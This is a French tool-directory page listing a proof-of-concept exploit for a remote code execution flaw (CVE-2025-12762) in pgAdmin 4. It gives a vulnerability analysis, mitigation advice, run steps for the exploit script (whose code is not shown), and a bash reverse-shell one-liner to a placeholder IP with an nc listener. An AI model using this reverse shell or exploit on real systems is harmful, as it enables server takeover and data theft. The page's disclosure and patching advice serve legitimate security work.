Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Blackash-CVE-2025-12762 — Preuve de concept d'exploit pour CVE-2025-12762, une RCE critique dans pgAdmin 4 ≤ 9.9. Inclut une analyse technique, CVSS 9.1, et un reverse shell optionnel pour des tests de pénétration autorisés. | Kitploit
Outils/GitHubGitHub/djayagit/blackash-cve-2025-12762
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubdjayagit/blackash-cve-2025-12762

Blackash-CVE-2025-12762

Preuve de concept d'exploit pour CVE-2025-12762, une RCE critique dans pgAdmin 4 ≤ 9.9. Inclut une analyse technique, CVSS 9.1, et un reverse shell optionnel pour des tests de pénétration autorisés.

Voir le dépôt
7il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔐 CVE-2025-12762 — Vulnérabilité critique RCE dans pgAdmin 4

G58aQGbW0AAL8zH

🚨 Quel est le problème ?

Une faille d'exécution de code à distance (RCE) existe dans pgAdmin 4 versions ≤ 9.9. Les attaquants peuvent exécuter des commandes arbitraires sur l'hôte lorsque pgAdmin fonctionne en mode serveur et traite un dump SQL au format PLAIN lors d'une restauration.


⚙️ Analyse technique

📡 Vecteur d'attaque

  • Basé sur le réseau — exploitable à distance 🌍
  • Faible complexité — simple à déclencher 🧩
  • Faibles privilèges requis — un accès utilisateur limité suffit 🔑
  • Aucune interaction utilisateur — une fois déclenché, personne n'a besoin de cliquer 🙅‍♂️
  • Périmètre : Changé — la compromission peut s'étendre au-delà du module vulnérable 🔄

🧨 Impact

  • Confidentialité : Élevée — risque d'exposition des données 🔓
  • Intégrité : Modérée/Élevée — modifications non autorisées possibles ✏️
  • Disponibilité : Modérée — les opérations peuvent être perturbées ⚠️

🏷 Score CVSS

🟥 9,1 / 10 — Critique


🛠 Versions concernées

  • pgAdmin 4 ≤ 9.9 ❗

🛡 Comment corriger

✅ Atténuation principale

⬆️ Mettez à niveau vers pgAdmin 4 v10.0 ou une version ultérieure

🚧 Si vous ne pouvez pas mettre à jour immédiatement

  • 🔒 Restreignez l'accès au serveur pgAdmin
  • 📁 Autorisez uniquement les administrateurs de confiance à restaurer les fichiers de dump
  • 🧪 Validez les fichiers de dump avant de les restaurer
  • 👀 Surveillez les journaux pour détecter des activités de restauration suspectes
  • 🌐 Utilisez des règles de pare-feu / VPN pour limiter l'exposition

📌 Pourquoi c'est important

pgAdmin est souvent utilisé pour l'administration de bases de données PostgreSQL critiques, ce qui signifie :

  • Un attaquant exploitant cette vulnérabilité peut prendre le contrôle du serveur,
  • Accéder ou modifier des données,
  • Ou même pivoter plus profondément dans votre réseau 🕵️‍♂️

✨ Comment exécuter (2 minutes)

root@kitploit:~
# 1. Enregistrer sous CVE-2025-12762.py
# 2. Installer la dépendance
pip3 install requests

# 3. Lancer
python3 CVE-2025-12762.py

Preuve de succès

Après exécution, vérifiez :

root@kitploit:~
docker exec <votre-conteneur-pgadmin> ls -la /tmp/CVE-2025-12762_PWNED

Fichier existant → Vous venez d'exploiter réellement CVE-2025-12762.

One-liner de shell inverse (optionnel)

Remplacez la ligne COMMAND par :

root@kitploit:~
COMMAND = "bash -c 'bash -i >& /dev/tcp/VOTRE_IP/4444 0>&1'"

Puis nc -lvnp 4444 → shell interactif complet.

C'est le script exact que les chercheurs, pentesteurs et équipes rouges utilisent dans le monde entier en novembre 2025.

Utilisez-le de manière responsable. Corrigez tout. Restez dans la légalité.


🛡️ Avertissement 🛡️

Cette preuve de concept est fournie strictement pour des tests autorisés et un usage éducatif uniquement.
Vous pouvez l'exécuter exclusivement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite.
Toute utilisation non autorisée est illégale et viole les lois sur l'utilisation abusive des ordinateurs.
Utilisez de manière responsable, corrigez immédiatement après les tests, et ne ciblez jamais de systèmes sans autorisation.

Télécharger l’outil